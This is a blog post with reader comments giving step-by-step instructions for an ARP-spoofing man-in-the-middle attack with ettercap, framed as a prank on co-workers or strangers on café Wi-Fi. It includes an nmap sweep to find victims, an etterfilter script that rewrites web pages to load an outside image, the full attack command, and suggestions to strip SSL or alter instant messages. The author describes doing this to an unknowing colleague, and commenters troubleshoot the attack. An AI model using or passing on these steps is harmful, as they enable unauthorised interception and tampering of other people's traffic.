Prank Hacking Your Co-workers for Fun
I have a funny prank/hack to pull at the office, Denny’s, Starbucks, etc. Anytime you are connected to a wireless access point, you can potentially target any victim on your network, run a man-in-the-middle attack, and manipulate their packets. For example, I used a filter to replace ALL occurrences of img src=” with img src=”http://www.cranklin.com/mickey.png”. What does this do? It replaces all images (loaded with the html img tag) on the victim’s web browser with an image of my liking. For our example here, I will use this awesome picture of Mickey Mouse (with my domain name advertised on it of course).
Here are some snapshots of the screen on another computer in the network.
The website you are seeing is www.nhm.org (Natural History Museum of Los Angeles). Surprise… Mickey Mouse is all over their website. You can get really creative with the filters. You can replace all the links with your own… you can turn off SSL encryption, you can even manipulate Instant Messenger messages and replace all messages with hate messages… etc. LOL.
As a matter of fact, while I was working at IdeaLab, I was testing my filters out on my victim, Shana. At that time, she was doing something on the email newsletter website and I was tampering with her packets. Though it didn’t work properly, she kept getting frustrated because the site wasn’t functioning correctly. The fact is, everytime I ran the filter, bizarre things would happen on the site…. and everytime I turned off the filter, the site would behave normal. I was trying real hard to keep a straight face and not bust up in laughter.
So how did I do it?
When you feel like being mischievous, connect your computer to a wireless access point. (Mac/Linux/Unix) run: route -n (Windows) run: ipconfig and note the IP address of your gateway.
Find the local IP address of your victim. Running something like nmap -sP 192.168.1.* will help you do this. Note the IP address of your victim.
Now, we’re going run what we call a “man-in-the-middle attack”. This is done by ARP spoofing. The way it works is that we pretend to be the gateway. The victim will unknowingly direct all his/her packets to your PC rather than the gateway. Your PC forwards those packets to the gateway so the victim’s network connection never gets severed. To do this, first turn on packet forwarding by running sudo echo 1 > /proc/sys/net/ipv4/ip_forward . (This will differ depending on your OS).
Now, to construct your filter. My filter file “mickeymouse.filter” looks like this:
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://www.cranklin.com/mickey.png\" ");
replace("IMG SRC=", "img src=\"http://www.cranklin.com/mickey.png\" ");
msg("Filter Ran.\n");
}
You need to compile it using ettercap’s filter compiler by running etterfilter mickeymouse.filter -o mickeymouse.ef
Now, you’re ready to run the attack with this:
sudo ettercap -i eth1 -T -q -F mickeymouse.ef -M arp:remote /192.168.1.1/ /192.168.1.101/
The first IP is the IP of your gateway. The second IP is the IP of your victim. Your wireless interface may also be different depending on your computer. In my case, it is eth1.
LOL. Very funny prank. Imagine messing with that stranger on his/her computer at Starbucks. I still have trouble making it work with gzip compression on some web servers. You can also do this same thing without targeting 1 victim at a time. Using a nifty tool called “airpwn”, you can intercept packets in the air and beat the webserver to the victims’ computers. The REAL packets will be out of sequence and therefore ignored.
cranklin.com 
How do you set up the lo and eth0 interface on Ubuntu Linux? I can’t find anything substantial on the web.
Hey Michael, the lo interface should already be there. The eth0, eth1, wlan0, wlan1,….. interfaces depend on your OS/hardware. When you run “ifconfig” what do you see?
I see lo, eth0, and wlan0. I’ve tried the mon0 interface, but ettercap isn’t compatible with it for some reason. The ironic thing is that stupid incompatibilitys and errors were the reason I ditched Windows in the first place.
Ettercap doesn’t work with wlan0? That is odd. Ettercap doesn’t require the wifi adapter to go into monitor mode or anything like that. The problem is that a lot of these wireless chipsets don’t allow monitor/inject modes (on any OS)… I went out and bought a wireless dongle that specifically allows for those. If you have a wireless adapter that only works on windows, you can use madwifi or ndiswrapper which basically wraps the windows driver and makes it functional…. however, it still doesn’t allow you to monitor or inject.
What distro+kernel were you using during this, Cranklin? I’m having trouble getting it to consistently work post 3.2.x. So far, only Backtrack 5r3 has sort of worked.
Really? I last tried it on ubuntu 10.04. I recently upgraded to 12.04 but haven’t tried it since.
Also what version of Ettercap?
Lol try it again. It seems everyone on the internet has a problem past Ubuntu 10.x.
serious? Okay. I will attempt it.
I’m new to this kind of attacking so I’m not keen to the details. It appears that at some point in kernel changes these L3 Send Errors began to show. I am almost constantly seeing them on all distros. As I mentioned, Backtrack 5r3 (which comes with ettercap 0.7.4.1, I believe) has worked using the attack you illustrated, but only a few websites. I know you mentioned the attack may have issues with some compression formats, but most of the time when the attack does not appear to work, the console is littered with these errors:
SEND L3 ERROR: 1298 byte packet (0800:06) destined to xxx.xxx.xx.xxx was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
It appears the recent versions of ettercap solve this, but as I mentioned the version that is packaged in the default apt-get repositories is not the updated version (thats my theory, at least).
I’ve attempted to compile the newer version myself but am having trouble creating a filter for the new version. As you can likely tell, I’m not very proficient in Linux. I love running into these problems because that’s when I learn the most, lol.
For reference, one of the sites that is working is http://opensource.com/. I wonder why its so special?
By the way, what’s your take on Ubuntu’s direction?
https://www.eff.org/deeplinks/2012/10/privacy-ubuntu-1210-amazon-ads-and-data-leaks
I definitely don’t like it. I stick to the LTS versions only… even then, I don’t rush the upgrade. I don’t like unity, but I can deal with it. I’m thinking of making the jump to Mint and going back to good ‘ol fluxbox. But no matter what, I’m sticking to debian flavors.
Ubuntu’s direction is getting out of hand. I like Mint, I guess. I’ve tried 13 and 14 but found minor issues with both that sent me looking elsewhere. After now giving Arch and Backtrack a go, I might retreat back to Mint 13 LTS in an effort to get it the way I want it. I really just want a distro that I can put pen testing tools on and not have to spend too much time getting them to work. As a bonus, I’m trying to learn a way to backup or automate installs so I can quickly put it on new computers when needed. This will keep me busy lol.
I tried using ettercap on 12.04 and it seems to work fine. As a matter of fact, it even adds a few new features like SSL mitm. Just make sure you’re editing /etc/etter.conf and setting UID and GID to 0
That must be my issue. I don’t remember editing that conf file nor do those variables sound familiar. I suspect you compiled from source?
Actually, no. I simply apt-get my ettercap.
Wow! Not bad, I was wondering if you could go more into depth on the windows side of this. Also whats your take on Windows vs Mac?
Hey Evan, I don’t have a windows machine so I can’t get into depth on it. As for the Windows vs Mac argument, I would go with Mac… but my first choice is always Linux.
I compiled the filter and ran it but nothing happened on the other computer.. I removed the # in etter.conf file so ettercap would control ip-forwarding.. can’t find the error
Hello mates, how is the whole thing, and
what you want to say about this paragraph, in my view its genuinely amazing
in support of me.